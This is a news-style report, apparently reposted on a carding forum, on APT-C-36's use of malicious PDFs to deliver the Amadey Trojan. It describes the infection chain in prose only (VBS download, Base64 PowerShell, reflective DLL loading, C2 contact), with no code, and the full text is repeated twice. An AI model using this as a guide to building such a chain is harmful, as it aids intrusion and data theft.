Carding 4 Carders
Professional
A harmless PDF can take control of your data.
Cybersecurity experts from the 360 Threat Intelligence Center team have discovered a new campaign by the APT-C-36 group, known for its targeted phishing attacks. This time, cybercriminals decided to step up their attacks by introducing the Amadey Trojan into a campaign to distribute malicious PDF documents.
The Amadey Trojan first appeared on the market in October 2018 and is a modular botnet capable of bypassing the protection of internal networks, stealing information, remotely managing infected systems, performing DDoS attacks, and other actions.
The detected documents contain a malicious VBS script that is downloaded from cloud services and disguised as an encrypted compressed packet. Once activated, the script uses Powershell to execute malicious code represented in Base64 encoding.
net_dll, a component often used by APT — C-36 for Reflective DLL Loading, and Amadey itself were detected as part of the loaded payloads. Attackers can use the Trojan to perform a wide range of actions, including data theft and Lateral Movement within the network.
During the attack, the Trojan is integrated into the system process, which allows it to operate unnoticed in the infected system. After gaining control, Amadey downloads additional malicious files, including components for collecting confidential information and executing malicious scripts.
Each step of the attack is coordinated with the Command and Control server (C2), which receives data about the infected computer from the Trojan. This communication allows APT-C-36 operators to monitor malware deployment and collect data.
It is important to note that the methods used in this attack are similar to those used by hackers in the past, which indicates their preference for proven approaches. However, the active introduction of new tools and improvements to existing tactics indicates that APT-C-36 continues to develop its capabilities.
Experts warn that the group's actions are not limited to one region, and their attacks affect users around the world. With the development of APT-C-36 tactics and tools, we can expect an increase in the number and complexity of targeted attacks, which requires increased attention to cybersecurity measures on the part of organizations and individuals.
Cybersecurity experts from the 360 Threat Intelligence Center team have discovered a new campaign by the APT-C-36 group, known for its targeted phishing attacks. This time, cybercriminals decided to step up their attacks by introducing the Amadey Trojan into a campaign to distribute malicious PDF documents.
The Amadey Trojan first appeared on the market in October 2018 and is a modular botnet capable of bypassing the protection of internal networks, stealing information, remotely managing infected systems, performing DDoS attacks, and other actions.
The detected documents contain a malicious VBS script that is downloaded from cloud services and disguised as an encrypted compressed packet. Once activated, the script uses Powershell to execute malicious code represented in Base64 encoding.
net_dll, a component often used by APT — C-36 for Reflective DLL Loading, and Amadey itself were detected as part of the loaded payloads. Attackers can use the Trojan to perform a wide range of actions, including data theft and Lateral Movement within the network.
During the attack, the Trojan is integrated into the system process, which allows it to operate unnoticed in the infected system. After gaining control, Amadey downloads additional malicious files, including components for collecting confidential information and executing malicious scripts.
Each step of the attack is coordinated with the Command and Control server (C2), which receives data about the infected computer from the Trojan. This communication allows APT-C-36 operators to monitor malware deployment and collect data.
It is important to note that the methods used in this attack are similar to those used by hackers in the past, which indicates their preference for proven approaches. However, the active introduction of new tools and improvements to existing tactics indicates that APT-C-36 continues to develop its capabilities.
Experts warn that the group's actions are not limited to one region, and their attacks affect users around the world. With the development of APT-C-36 tactics and tools, we can expect an increase in the number and complexity of targeted attacks, which requires increased attention to cybersecurity measures on the part of organizations and individuals.
